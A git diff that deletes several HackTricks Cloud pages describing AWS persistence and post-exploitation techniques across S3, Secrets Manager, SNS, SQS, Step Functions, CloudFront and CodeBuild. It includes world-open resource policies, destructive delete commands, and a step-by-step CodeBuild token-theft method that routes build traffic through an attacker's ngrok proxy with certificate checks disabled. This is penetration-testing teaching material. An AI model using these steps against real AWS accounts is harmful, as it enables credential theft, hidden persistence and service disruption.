-{% endhint %} - -## S3 - -For more information check: - -{% content-ref url="../aws-services/aws-s3-athena-and-glacier-enum.md" %} -[aws-s3-athena-and-glacier-enum.md](../aws-services/aws-s3-athena-and-glacier-enum.md) -{% endcontent-ref %} - -### KMS Client-Side Encryption - -When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again: - -
- -Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it. - -### Using S3 ACLs - -Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md deleted file mode 100644 index 9349605bc..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md +++ /dev/null @@ -1,79 +0,0 @@ -# AWS - Secrets Manager Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secrets Manager - -For more info check: - -{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} -[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) -{% endcontent-ref %} - -### Via Resource Policies - -It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**. - -### Via Secrets Rotate Lambda - -To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself. - -This is how lambda code for such action could look like: - -```python -import boto3 - -def rotate_secrets(event, context): - # Create a Secrets Manager client - client = boto3.client('secretsmanager') - - # Retrieve the current secret value - secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] - - # Rotate the secret by updating its value - new_secret_value = rotate_secret(secret_value) - client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) - -def rotate_secret(secret_value): - # Perform the rotation logic here, e.g., generate a new password - - # Example: Generate a new password - new_secret_value = generate_password() - - return new_secret_value - -def generate_password(): - # Example: Generate a random password using the secrets module - import secrets - import string - password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) - return password -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md deleted file mode 100644 index cb0b70d82..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md +++ /dev/null @@ -1,107 +0,0 @@ -# AWS - SNS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SNS - -For more information check: - -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} - -### Persistence - -When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**: - -```json -{ - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__default_statement_ID", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "SNS:Publish", - "SNS:RemovePermission", - "SNS:SetTopicAttributes", - "SNS:DeleteTopic", - "SNS:ListSubscriptionsByTopic", - "SNS:GetTopicAttributes", - "SNS:AddPermission", - "SNS:Subscribe" - ], - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo", - "Condition": { - "StringEquals": { - "AWS:SourceOwner": "318142138553" - } - } - }, - { - "Sid": "__console_pub_0", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "SNS:Publish", - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" - }, - { - "Sid": "__console_sub_0", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "SNS:Subscribe", - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" - } - ] -} -``` - -### Create Subscribers - -To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**. - -Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used. - -```bash -aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md deleted file mode 100644 index 88c12a549..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md +++ /dev/null @@ -1,68 +0,0 @@ -# AWS - SQS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SQS - -For more information check: - -{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} -[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) -{% endcontent-ref %} - -### Using resource policy - -In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**: - -```json -{ - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__owner_statement", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "SQS:*" - ], - "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" - } - ] -} -``` - -{% hint style="info" %} -You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} -{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md deleted file mode 100644 index 0c7b2c9e4..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - Step Functions Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Step Functions - -For more information check: - -{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %} -[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md) -{% endcontent-ref %} - -### Step function Backdooring - -Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps. - -### Backdooring aliases - -If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md deleted file mode 100644 index 8a7a800b7..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md +++ /dev/null @@ -1,57 +0,0 @@ -# AWS - CloudFront Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CloudFront - -For more information check: - -{% content-ref url="../aws-services/aws-cloudfront-enum.md" %} -[aws-cloudfront-enum.md](../aws-services/aws-cloudfront-enum.md) -{% endcontent-ref %} - -### Man-in-the-Middle - -This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script). - -#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket - -* **Create** the malicious **function**. -* **Associate** it with the CloudFront distribution. -* Set the **event type to "Viewer Response"**. - -Accessing the response you could steal the users cookie and inject a malicious JS. - -#### scenario 2: MitM where CloudFront is already using a lambda function - -* **Modify the code** of the lambda function to steal sensitive information - -You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md deleted file mode 100644 index d0db82e8c..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md +++ /dev/null @@ -1,111 +0,0 @@ -# AWS - CodeBuild Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CodeBuild - -For more information, check: - -{% content-ref url="../../aws-services/aws-codebuild-enum.md" %} -[aws-codebuild-enum.md](../../aws-services/aws-codebuild-enum.md) -{% endcontent-ref %} - -### Check Secrets - -If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\ -Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform. - -{% content-ref url="../../aws-privilege-escalation/aws-secrets-manager-privesc.md" %} -[aws-secrets-manager-privesc.md](../../aws-privilege-escalation/aws-secrets-manager-privesc.md) -{% endcontent-ref %} - -### Abuse CodeBuild Repo Access - -In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code: - -
- -The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**. - -An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\ -In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you): - -
- -And **change the Buildspec commands to exfiltrate each repo**. - -{% hint style="warning" %} -However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\ -Or does he? Check the next section -{% endhint %} - -### Leaking Access Tokens from AWS CodeBuild - -You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with: - -```bash -aws codebuild list-source-credentials -``` - -{% content-ref url="aws-codebuild-token-leakage.md" %} -[aws-codebuild-token-leakage.md](aws-codebuild-token-leakage.md) -{% endcontent-ref %} - -### `codebuild:DeleteProject` - -An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project. - -```bash -aws codebuild delete-project --name -``` - -**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project. - -### `codebuild:TagResource` , `codebuild:UntagResource` - -An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - -```bash -aws codebuild tag-resource --resource-arn --tags -aws codebuild untag-resource --resource-arn --tag-keys -``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. - -### `codebuild:DeleteSourceCredentials` - -An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository. - -```sql -aws codebuild delete-source-credentials --arn -``` - -**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md deleted file mode 100644 index 51a05bbb1..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md +++ /dev/null @@ -1,222 +0,0 @@ -# AWS Codebuild - Token Leakage - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Recover Github/Bitbucket Configured Tokens - -First, check if there are any source credentials configured that you could leak: - -```bash -aws codebuild list-source-credentials -``` - -### Via Docker Image - -If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project. - -For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**. - -The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**. - -1. **Create & Upload your own Docker MitM image** - * Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**. - * **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint. - * You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host - * Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...) -2. **Set the environment** - * Create a **new Codebuild project** or **modify** the environment of an existing one. - * Set the project to use the **previously generated Docker image** - -
- -3. **Set the MitM proxy in your host** - -* As indicated in the **Github repo** you could use something like: - -```bash -mitmproxy --listen-port 4444 --allow-hosts "github.com" -``` - -{% hint style="success" %} -The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work. -{% endhint %} - -4. **Run the build & capture the credentials** - -* You can see the token in the **Authorization** header: - -
- -This could also be done from the aws cli with something like - -{% code overflow="wrap" %} -```bash -# Create project using a Github connection -aws codebuild create-project --cli-input-json file:///tmp/buildspec.json - -## With /tmp/buildspec.json -{ - "name": "my-demo-project", - "source": { - "type": "GITHUB", - "location": "https://github.com/uname/repo", - "buildspec": "buildspec.yml" - }, - "artifacts": { - "type": "NO_ARTIFACTS" - }, - "environment": { - "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM - "image": "docker.io/carlospolop/docker-mitm:v12", - "computeType": "BUILD_GENERAL1_SMALL", - "imagePullCredentialsType": "CODEBUILD" - } -} - -## Json - -# Start the build -aws codebuild start-build --project-name my-project2 -``` -{% endcode %} - -### Via insecureSSL - -**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\ -Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform. - -* First you need to enumerate the current configuration with something like: - -```bash -aws codebuild batch-get-projects --name -``` - -* Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration). - * Moreover, add also the env variables **http\_proxy** and **https\_proxy** pointing to your tcp ngrok like: - -{% code overflow="wrap" %} -```bash -aws codebuild update-project --name \ - --source '{ - "type": "GITHUB", - "location": "https://github.com/carlospolop/404checker", - "gitCloneDepth": 1, - "gitSubmodulesConfig": { - "fetchSubmodules": false - }, - "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", - "auth": { - "type": "CODECONNECTIONS", - "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" - }, - "reportBuildStatus": false, - "insecureSsl": true - }' \ - --environment '{ - "type": "LINUX_CONTAINER", - "image": "aws/codebuild/standard:5.0", - "computeType": "BUILD_GENERAL1_SMALL", - "environmentVariables": [ - { - "name": "http_proxy", - "value": "http://2.tcp.eu.ngrok.io:15027" - }, - { - "name": "https_proxy", - "value": "http://2.tcp.eu.ngrok.io:15027" - } - ] - }' -``` -{% endcode %} - -* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy) - -```python -from mitm import MITM, protocol, middleware, crypto - -mitm = MITM( - host="0.0.0.0", - port=4444, - protocols=[protocol.HTTP], - middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. - certificate_authority = crypto.CertificateAuthority() -) -mitm.run() -``` - -* Next, click on **Build the project** or start the build from command line: - -```sh -aws codebuild start-build --project-name -``` - -* Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port: - -
- -### ~~Via HTTP protocol~~ - -{% hint style="success" %} -**This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)** -{% endhint %} - -An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**. - -* An attacker could add the environment variables **http\_proxy** and **https\_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`). - -
- -
- -* Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions` -* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy) - -```python -from mitm import MITM, protocol, middleware, crypto - -mitm = MITM( - host="127.0.0.1", - port=4444, - protocols=[protocol.HTTP], - middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. - certificate_authority = crypto.CertificateAuthority() -) -mitm.run() -``` - -* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port: - -
- -{% hint style="warning" %} -Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md deleted file mode 100644 index 1fa4d4d49..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md +++ /dev/null @@ -1,48 +0,0 @@ -# AWS - Control Tower Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
